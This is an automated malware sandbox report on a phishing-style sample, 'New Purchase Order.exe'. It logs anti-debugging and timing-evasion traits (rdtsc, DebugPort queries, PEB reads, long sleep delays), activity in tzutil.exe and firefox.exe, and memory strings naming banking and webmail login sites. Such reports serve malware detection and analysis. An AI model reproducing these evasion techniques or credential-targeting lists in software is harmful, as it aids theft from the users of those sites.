                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: C0B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0188096E rdtsc 3_2_0188096E
                Source: C:\Users\user\Desktop\New Purchase Order.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeWindow / User API: threadDelayed 9670Jump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\tzutil.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\New Purchase Order.exe TID: 7696Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 2532Thread sleep count: 303 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 2532Thread sleep time: -606000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 2532Thread sleep count: 9670 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 2532Thread sleep time: -19340000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\tzutil.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001DC9D0 FindFirstFileW,FindNextFileW,FindClose,8_2_001DC9D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: UQ63g7r-.8.drBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: UQ63g7r-.8.drBinary or memory string: global block list test formVMware20,11696497155
                Source: UQ63g7r-.8.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: UQ63g7r-.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: UQ63g7r-.8.drBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: UQ63g7r-.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: tzutil.exe, 00000008.00000002.2611141533.00000000027ED000.00000004.00000020.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2611412661.000000000063F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: UQ63g7r-.8.drBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: UQ63g7r-.8.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: UQ63g7r-.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: firefox.exe, 0000000B.00000002.2241672791.000001D803D4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: UQ63g7r-.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: UQ63g7r-.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: UQ63g7r-.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: UQ63g7r-.8.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: UQ63g7r-.8.drBinary or memory string: AMC password management pageVMware20,11696497155
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: UQ63g7r-.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: UQ63g7r-.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: UQ63g7r-.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: UQ63g7r-.8.drBinary or memory string: discord.comVMware20,11696497155f
                Source: UQ63g7r-.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: UQ63g7r-.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: UQ63g7r-.8.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: UQ63g7r-.8.drBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: UQ63g7r-.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: UQ63g7r-.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: UQ63g7r-.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0188096E rdtsc 3_2_0188096E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_00417B63 LdrLoadDll,3_2_00417B63
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018FC188 mov eax, dword ptr fs:[00000030h]3_2_018FC188
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018FC188 mov eax, dword ptr fs:[00000030h]3_2_018FC188
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01880185 mov eax, dword ptr fs:[00000030h]3_2_01880185
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E4180 mov eax, dword ptr fs:[00000030h]3_2_018E4180
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E4180 mov eax, dword ptr fs:[00000030h]3_2_018E4180
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C019F mov eax, dword ptr fs:[00000030h]3_2_018C019F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C019F mov eax, dword ptr fs:[00000030h]3_2_018C019F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C019F mov eax, dword ptr fs:[00000030h]3_2_018C019F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C019F mov eax, dword ptr fs:[00000030h]3_2_018C019F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183A197 mov eax, dword ptr fs:[00000030h]3_2_0183A197
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183A197 mov eax, dword ptr fs:[00000030h]3_2_0183A197
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183A197 mov eax, dword ptr fs:[00000030h]3_2_0183A197
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_019061C3 mov eax, dword ptr fs:[00000030h]3_2_019061C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_019061C3 mov eax, dword ptr fs:[00000030h]3_2_019061C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BE1D0 mov eax, dword ptr fs:[00000030h]3_2_018BE1D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BE1D0 mov eax, dword ptr fs:[00000030h]3_2_018BE1D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BE1D0 mov ecx, dword ptr fs:[00000030h]3_2_018BE1D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BE1D0 mov eax, dword ptr fs:[00000030h]3_2_018BE1D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BE1D0 mov eax, dword ptr fs:[00000030h]3_2_018BE1D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_019161E5 mov eax, dword ptr fs:[00000030h]3_2_019161E5
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018701F8 mov eax, dword ptr fs:[00000030h]3_2_018701F8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EE10E mov eax, dword ptr fs:[00000030h]3_2_018EE10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EE10E mov ecx, dword ptr fs:[00000030h]3_2_018EE10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EE10E mov eax, dword ptr fs:[00000030h]3_2_018EE10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EE10E mov eax, dword ptr fs:[00000030h]3_2_018EE10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EE10E mov ecx, dword ptr fs:[00000030h]3_2_018EE10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EE10E mov eax, dword ptr fs:[00000030h]3_2_018EE10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EE10E mov eax, dword ptr fs:[00000030h]3_2_018EE10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EE10E mov ecx, dword ptr fs:[00000030h]3_2_018EE10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EE10E mov eax, dword ptr fs:[00000030h]3_2_018EE10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EE10E mov ecx, dword ptr fs:[00000030h]3_2_018EE10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01900115 mov eax, dword ptr fs:[00000030h]3_2_01900115
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EA118 mov ecx, dword ptr fs:[00000030h]3_2_018EA118
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EA118 mov eax, dword ptr fs:[00000030h]3_2_018EA118
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EA118 mov eax, dword ptr fs:[00000030h]3_2_018EA118
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EA118 mov eax, dword ptr fs:[00000030h]3_2_018EA118
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01870124 mov eax, dword ptr fs:[00000030h]3_2_01870124
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D4144 mov eax, dword ptr fs:[00000030h]3_2_018D4144
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D4144 mov eax, dword ptr fs:[00000030h]3_2_018D4144
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D4144 mov ecx, dword ptr fs:[00000030h]3_2_018D4144
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D4144 mov eax, dword ptr fs:[00000030h]3_2_018D4144
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D4144 mov eax, dword ptr fs:[00000030h]3_2_018D4144
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01846154 mov eax, dword ptr fs:[00000030h]3_2_01846154
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01846154 mov eax, dword ptr fs:[00000030h]3_2_01846154
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183C156 mov eax, dword ptr fs:[00000030h]3_2_0183C156
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D8158 mov eax, dword ptr fs:[00000030h]3_2_018D8158
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01914164 mov eax, dword ptr fs:[00000030h]3_2_01914164
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01914164 mov eax, dword ptr fs:[00000030h]3_2_01914164
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184208A mov eax, dword ptr fs:[00000030h]3_2_0184208A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018380A0 mov eax, dword ptr fs:[00000030h]3_2_018380A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D80A8 mov eax, dword ptr fs:[00000030h]3_2_018D80A8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_019060B8 mov eax, dword ptr fs:[00000030h]3_2_019060B8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_019060B8 mov ecx, dword ptr fs:[00000030h]3_2_019060B8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C20DE mov eax, dword ptr fs:[00000030h]3_2_018C20DE
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0183A0E3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C60E0 mov eax, dword ptr fs:[00000030h]3_2_018C60E0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018480E9 mov eax, dword ptr fs:[00000030h]3_2_018480E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183C0F0 mov eax, dword ptr fs:[00000030h]3_2_0183C0F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018820F0 mov ecx, dword ptr fs:[00000030h]3_2_018820F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C4000 mov ecx, dword ptr fs:[00000030h]3_2_018C4000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h]3_2_018E2000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h]3_2_018E2000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h]3_2_018E2000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h]3_2_018E2000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h]3_2_018E2000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h]3_2_018E2000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h]3_2_018E2000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h]3_2_018E2000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185E016 mov eax, dword ptr fs:[00000030h]3_2_0185E016
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185E016 mov eax, dword ptr fs:[00000030h]3_2_0185E016
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185E016 mov eax, dword ptr fs:[00000030h]3_2_0185E016
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185E016 mov eax, dword ptr fs:[00000030h]3_2_0185E016
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183A020 mov eax, dword ptr fs:[00000030h]3_2_0183A020
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183C020 mov eax, dword ptr fs:[00000030h]3_2_0183C020
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D6030 mov eax, dword ptr fs:[00000030h]3_2_018D6030
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01842050 mov eax, dword ptr fs:[00000030h]3_2_01842050
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C6050 mov eax, dword ptr fs:[00000030h]3_2_018C6050
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186C073 mov eax, dword ptr fs:[00000030h]3_2_0186C073
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186438F mov eax, dword ptr fs:[00000030h]3_2_0186438F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186438F mov eax, dword ptr fs:[00000030h]3_2_0186438F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183E388 mov eax, dword ptr fs:[00000030h]3_2_0183E388
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183E388 mov eax, dword ptr fs:[00000030h]3_2_0183E388
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183E388 mov eax, dword ptr fs:[00000030h]3_2_0183E388
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01838397 mov eax, dword ptr fs:[00000030h]3_2_01838397
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01838397 mov eax, dword ptr fs:[00000030h]3_2_01838397
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01838397 mov eax, dword ptr fs:[00000030h]3_2_01838397
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018FC3CD mov eax, dword ptr fs:[00000030h]3_2_018FC3CD
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A3C0 mov eax, dword ptr fs:[00000030h]3_2_0184A3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A3C0 mov eax, dword ptr fs:[00000030h]3_2_0184A3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A3C0 mov eax, dword ptr fs:[00000030h]3_2_0184A3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A3C0 mov eax, dword ptr fs:[00000030h]3_2_0184A3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A3C0 mov eax, dword ptr fs:[00000030h]3_2_0184A3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A3C0 mov eax, dword ptr fs:[00000030h]3_2_0184A3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018483C0 mov eax, dword ptr fs:[00000030h]3_2_018483C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018483C0 mov eax, dword ptr fs:[00000030h]3_2_018483C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018483C0 mov eax, dword ptr fs:[00000030h]3_2_018483C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018483C0 mov eax, dword ptr fs:[00000030h]3_2_018483C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C63C0 mov eax, dword ptr fs:[00000030h]3_2_018C63C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EE3DB mov eax, dword ptr fs:[00000030h]3_2_018EE3DB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EE3DB mov eax, dword ptr fs:[00000030h]3_2_018EE3DB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EE3DB mov ecx, dword ptr fs:[00000030h]3_2_018EE3DB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EE3DB mov eax, dword ptr fs:[00000030h]3_2_018EE3DB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E43D4 mov eax, dword ptr fs:[00000030h]3_2_018E43D4
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E43D4 mov eax, dword ptr fs:[00000030h]3_2_018E43D4
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018503E9 mov eax, dword ptr fs:[00000030h]3_2_018503E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018503E9 mov eax, dword ptr fs:[00000030h]3_2_018503E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018503E9 mov eax, dword ptr fs:[00000030h]3_2_018503E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018503E9 mov eax, dword ptr fs:[00000030h]3_2_018503E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018503E9 mov eax, dword ptr fs:[00000030h]3_2_018503E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018503E9 mov eax, dword ptr fs:[00000030h]3_2_018503E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018503E9 mov eax, dword ptr fs:[00000030h]3_2_018503E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018503E9 mov eax, dword ptr fs:[00000030h]3_2_018503E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185E3F0 mov eax, dword ptr fs:[00000030h]3_2_0185E3F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185E3F0 mov eax, dword ptr fs:[00000030h]3_2_0185E3F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185E3F0 mov eax, dword ptr fs:[00000030h]3_2_0185E3F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018763FF mov eax, dword ptr fs:[00000030h]3_2_018763FF
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187A30B mov eax, dword ptr fs:[00000030h]3_2_0187A30B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187A30B mov eax, dword ptr fs:[00000030h]3_2_0187A30B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187A30B mov eax, dword ptr fs:[00000030h]3_2_0187A30B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183C310 mov ecx, dword ptr fs:[00000030h]3_2_0183C310
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01860310 mov ecx, dword ptr fs:[00000030h]3_2_01860310
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0190A352 mov eax, dword ptr fs:[00000030h]3_2_0190A352
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C2349 mov eax, dword ptr fs:[00000030h]3_2_018C2349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C035C mov eax, dword ptr fs:[00000030h]3_2_018C035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C035C mov eax, dword ptr fs:[00000030h]3_2_018C035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C035C mov eax, dword ptr fs:[00000030h]3_2_018C035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C035C mov ecx, dword ptr fs:[00000030h]3_2_018C035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C035C mov eax, dword ptr fs:[00000030h]3_2_018C035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C035C mov eax, dword ptr fs:[00000030h]3_2_018C035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E8350 mov ecx, dword ptr fs:[00000030h]3_2_018E8350
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E437C mov eax, dword ptr fs:[00000030h]3_2_018E437C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E284 mov eax, dword ptr fs:[00000030h]3_2_0187E284
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E284 mov eax, dword ptr fs:[00000030h]3_2_0187E284
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C0283 mov eax, dword ptr fs:[00000030h]3_2_018C0283
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C0283 mov eax, dword ptr fs:[00000030h]3_2_018C0283
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C0283 mov eax, dword ptr fs:[00000030h]3_2_018C0283
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018502A0 mov eax, dword ptr fs:[00000030h]3_2_018502A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018502A0 mov eax, dword ptr fs:[00000030h]3_2_018502A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D62A0 mov eax, dword ptr fs:[00000030h]3_2_018D62A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D62A0 mov ecx, dword ptr fs:[00000030h]3_2_018D62A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D62A0 mov eax, dword ptr fs:[00000030h]3_2_018D62A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D62A0 mov eax, dword ptr fs:[00000030h]3_2_018D62A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D62A0 mov eax, dword ptr fs:[00000030h]3_2_018D62A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D62A0 mov eax, dword ptr fs:[00000030h]3_2_018D62A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A2C3 mov eax, dword ptr fs:[00000030h]3_2_0184A2C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A2C3 mov eax, dword ptr fs:[00000030h]3_2_0184A2C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A2C3 mov eax, dword ptr fs:[00000030h]3_2_0184A2C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A2C3 mov eax, dword ptr fs:[00000030h]3_2_0184A2C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A2C3 mov eax, dword ptr fs:[00000030h]3_2_0184A2C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018502E1 mov eax, dword ptr fs:[00000030h]3_2_018502E1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018502E1 mov eax, dword ptr fs:[00000030h]3_2_018502E1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018502E1 mov eax, dword ptr fs:[00000030h]3_2_018502E1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183823B mov eax, dword ptr fs:[00000030h]3_2_0183823B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C8243 mov eax, dword ptr fs:[00000030h]3_2_018C8243
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C8243 mov ecx, dword ptr fs:[00000030h]3_2_018C8243
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183A250 mov eax, dword ptr fs:[00000030h]3_2_0183A250
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01846259 mov eax, dword ptr fs:[00000030h]3_2_01846259
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018FA250 mov eax, dword ptr fs:[00000030h]3_2_018FA250
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018FA250 mov eax, dword ptr fs:[00000030h]3_2_018FA250
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01844260 mov eax, dword ptr fs:[00000030h]3_2_01844260
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01844260 mov eax, dword ptr fs:[00000030h]3_2_01844260
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01844260 mov eax, dword ptr fs:[00000030h]3_2_01844260
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183826B mov eax, dword ptr fs:[00000030h]3_2_0183826B
